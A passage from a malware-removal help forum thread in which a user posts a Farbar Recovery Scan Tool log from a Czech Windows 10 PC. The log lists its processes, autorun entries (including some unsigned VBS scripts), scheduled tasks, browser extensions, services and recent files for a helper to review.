AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########

Re: Please check my log

Posted: 20 Jan 2021 17:58
by Rudy
Please post new FRST+Addition logs.

Re: Please check my log

Posted: 20 Jan 2021 18:50
by chenny
FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 18:40:54)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:40 - 2021-01-20 18:41 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 18:41 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
